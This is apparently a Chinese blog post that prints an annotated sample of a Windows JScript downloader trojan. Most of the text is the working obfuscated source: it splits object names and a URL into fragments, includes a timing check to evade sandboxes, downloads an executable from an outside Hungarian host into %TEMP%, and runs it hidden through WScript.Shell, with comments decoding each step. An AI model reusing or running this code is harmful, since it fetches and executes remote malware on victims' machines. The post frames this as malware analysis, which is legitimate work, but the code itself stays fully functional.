//经过样本分析和抓取,该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";

var VLjBZijBRDIxir = "sd";

var mzHiDfbVgtzWL = "uhi";

var XrxesgIWQ = "ya";

var STgtocEaUgS = "f";

var Mccq = "gsd";

var YVFRNFKC = "a7o";

var zokYxgifSUOsDIn = "d8f";

var rysGOQRkJ = "hgs";

var fAJEpxv = "7";

var LzK = "u";

var WnKggbYjhbgaYK = "dfa";

var RQJm = "s";

var tcbpCSVm = "o";

var glYioNGTMO = "a";

var cMleB = "fkj";

var guMAPaymgfr = ";l";

var aWosZJAl = "d";

var rrruwakBVMdHT = "s";

var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------

var wxGM = "f";

var wME = "sd";

var WYl = "hi";

var DgXr = "yau";

var OFbjPAVgdUDSr = "sdf";

var AKaUjBxV = "g";

var YWyNEBKTCAr = "a7o";

var UmkNXPoXKvV = "8f";

var jrUTHQOJCXz = "d";

var VMrAuxWTPKwLZbj = "hgs";

var hnAKwB = "au7";

var kuRwVoQ = "f";

var OXjw = "d";

var wSaGYFaTjPu = "aos";

var UdT = "j";

var wGKytuRmi = "k";

var FwSAu = ";lf";

var uSsmxvh = "d";

var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

////---------------------------------

var fvJysePITGsZ = "f";

var MJLm = "sd";

var OHdTWUSWyLDnD = "hi";

var NfkoHHanka = "au";

var pAJLp = "fy";

var xTeQe = "d";

var wolngRcKPNjI = "s";

var Ctd0 = "og";

var NGJpEc = "a7";

var johMrZhTBT = "f";

var rWRr = "d8";

var xhuyvlXNtG = "gs";

var AoFEsd = "7h";

var IarTKEg = "fau";

var UiCusNVVRYpV = "osd";

var SqXtHDCTAOoEfv = "ja";

var kSXJa = "k";

var AzMZQADlr = ";lf";

var OFZC = "sd";

var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//-----------------------------------

var wiM = "ose";

var cdzFN = "l";

var gtVOEyZRPMBkY = "c";//close();

//-----------------------------------

var FKqYCuGSVDKEk = "e";

var yLdfoNQSLG = "Fil";

var Kegv = "o";

var REweUeFfsfzCC = "veT";

var mCxYdwKmDTeZ = "Sa";//savetofile();

//-----------------------------------

var orFCagIxftilPY = "on";

var AnB = "iti";

var OeuDh = "pos";//position

//-----------------------------------

var bxwfUYaplk = "e";

var ZHBIenDJhvi = "t";

var OmwNrBIs = "wri";//write()

//-----------------------------------

var IonAXHdnbsJsHYL = "e";

var svvPS = "typ";//type

//-----------------------------------

var RxDykD = "n";

var ftsB = "ope";//open

//-----------------------------------

var zZoO = "am";

var TSCSrKWiKQY = "tre";

var AIfn = "B.S";

var zbAsfUmIk = "D";

var uWdDgxvOZcUG = "O";

var MUSaOvH = "D";

var YZVOwlzLPfausz = "A";//"adodb.stream"

//-----------------------------------

var pNGkr = "ct";

var iqPSquxJgp = "je";

var bTJnufjW = "b";

var lIexL = "teO";

var kZBJ = "rea";

var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";

var WWzPWldMX = "6n";

var CuF0 = "k6j";

var oUHbKSEqhF = "0";

var lQP = "hu/";

var RQUOidonsf = "l.";

var NjKvurbzu = "ta";

var CSyCCMfj = "por";

var XcTxpkvH = "egy";

var aUucLqfydBnSn = "j";

var lTXzk = "ev";

var mpAARoVfxvEsej = ".n";

var NVJeSNhziHjX = "www";

var JFDhyk = "://";

var CFpmRSiBsMp = "p";

var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4

//-----------------------------------

var uBtUfBIHbmz = "T";

var LwKK = "GE";// get

//-----------------------------------

var KRPXN = "pen";

var HrNtkpOuBMYa = "o";//open

//-----------------------------------

var OFdMpJOyw = "e";

var NlpqQU = "x";

var cZpOdxEyvqRfb = "7.e";

var cLfbaiuobq = "PO";

var XmXyEnhbtWhG = "M1";

var DQZEGAm = "ko";

var cKoUGmrGJtE = "SE";

var QasyJ = "Ky";//KySEKoM1PO7.exe

//-----------------------------------

var eQyCEVqQUazI = "%/";

var tNgKCALxxEpJMf = "P";

var mNYqbv = "M";

var FrwlCZOPjcmJvoE = "E";

var KyNfXZkSc = "%T";//%TEMP%/

//-----------------------------------

var AjbjrFWcHO = "gs";

var RyW = "in";

var LVlachWJa = "Str";

var NGjUy = "t";

var ZXMail = "n";

var XLaaPawDhGaz = "e";

var lRTf = "m";

var EGxwfaNKp = "ron";

var UCOpd = "vi";

var xZQvOWiNMG = "n";

var NLgbSPQIDLAIj = "ndE";

var Gyo = "xpa";

var gPYeoLnn = "E";//expendenvironmentstrings

//-----------------------------------

var kpsxpufDRzihIGv = "TP";

var vGOfgZZdOVh = "T";

var wJOAaSUgz = "LH";

var bPhWMdYs = "XM";

var AwpqZN = "2.";

var RNVidTrApbBfHO = "XML";

var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp

//-----------------------------------

var zkeMzwunlwoMdUD = "n";

var oVQABSTeJWqKG = "Ru";

var WkRVEzGFpaMCAC = "ell";

var AoJg = "h";

var HDveUfs = "S";

var PGItzPyn = ".";

var iTVqHxcrEbduDt = "t";

var wxGWFQyhW = "rip";

var KDSFP = "c";

var nzV = "WS";//wscript.shell.run()

//-----------------------------------

var NFFhujLOFwsUs = "ct";

var kvZBOvoVgLSEG = "je";

var DXP = "b";

var zjRmzjunjFUys = "O";

var EcDMPFvaxG = "e";

var stMA = "at";

var KnALPhmOVixZ = "Cre";//createobject()

//-----------------------------------

var aCTc = new Date();

var SZT0 = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var bRDtyPAQicD = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var VrU = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var DEyWdL = aCTc.getMilliseconds();

//

var NdNAj = bRDtyPAQicD - SZT0;

//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();

//

//    10s

var HRORMjJ = VrU - bRDtyPAQicD;

//    10s

var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);

//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)

//{

//    WshShell[run](NLN,0,0);

//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)

//{

//    return MSxml2.xmlhttp;

//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path

//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);

//

//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();

//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}

windows本地script脚本恶意代码分析(带注释)的更多相关文章

  1. 2018-2019-2 20165234 《网络对抗技术》 Exp4 恶意代码分析

    实验四 恶意代码分析 实验目的 1.监控自己系统的运行状态,看有没有可疑的程序在运行. 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals ...

  2. 2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析 一.原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2 ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp4 恶意代码分析

    2018-2019-2 20165312<网络攻防技术>Exp4 恶意代码分析 知识点总结 1.有关schtasks schtacks的作用:安排命令和程序定期运行或在指定时间内运行.从计 ...

  4. Exp4 恶意代码分析 20165110

    Exp4 恶意代码分析 20165110 一.实践目标 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行. 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生 ...

  5. 2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析 原理与实践说明 实践目标 实践内容概述 基础问题回答 实践过程记录 1.使用schtasks指令监控系统 2.使用sys ...

  6. 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析

    目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...

  7. 2018-2019-2 20165332 《网络对抗技术》Exp4 恶意代码分析

    2018-2019-2 20165332 <网络对抗技术>Exp4 恶意代码分析 原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分 ...

  8. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  9. Exp4 恶意代码分析

    一.原理与实践说明 1. 实践目标 1.1 监控你自己系统的运行状态,看有没有可疑的程序在运行. 1.2 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysin ...

随机推荐

  1. Expression2Sql的一些语法更新

    前言 前一阵子给大家介绍了一个可以将Expression表达式树解析成Transact-SQL的项目Expression2Sql. 之后得到了广大读者的一些好评,也使得博主更有动力继续更新下去,然后一 ...

  2. 怎样处理“error C2220: warning treated as error - no object file generated”错误

    最近用VS2010 编译ceflib开源库是出现"怎样处理"error C2220: warning treated as error - no object file gener ...

  3. view animation

    动画分为 帧动画    drawable animation 补间动画 view animation 属性动画  property animation 作用效果: 加载信息时loading动画 act ...

  4. swift开发学习网站

    1.https://github.com/Aufree/trip-to-iOS#ios- 2.http://www.code4app.com/forum.php?mod=viewthread& ...

  5. 启动tomcat部署项目时 ContainerBase.addChild: start:

    严重: ContainerBase.addChild: start: org.apache.catalina.LifecycleException: Failed to start component ...

  6. yyyy-MM-dd与YYYY-MM-dd

    Date date=new Date(); DateFormat sdf=new SimpleDateFormat("yyyy-MM-dd HH:MM:SS"); DateForm ...

  7. 可拖拽和带预览图的jQuery文件上传插件ssi-uploader

    插件描述:ssi-uploader是一款带预览图并且可以拖拽文件的jQuery ajax文件上传插件.该文件上传插件支持AJAX,支持多文件上传,可控制上的文件格式和文件大小,提供各种回调函数,使用非 ...

  8. WinForm中MouseEnter和MouseLeave混乱的问题

    MouseEnter+MouseLeave不行,我用了MouseMove+MouseLeave,效果一样 最近做个聊天的系统,仿照qq的界面设计,像qq聊天界面中字体.表情.截图等图片,鼠标放上去显示 ...

  9. Oracle SQL explain/execution Plan

    From http://blog.csdn.net/wujiandao/article/details/6621073 1. Four ways to get execution plan(anyti ...

  10. js 截取字符串,取指定位置的字符(完善中)

    1.获取字符串的最后一位或第一位 str.charAt(str.length - 1);    str.charAt(0);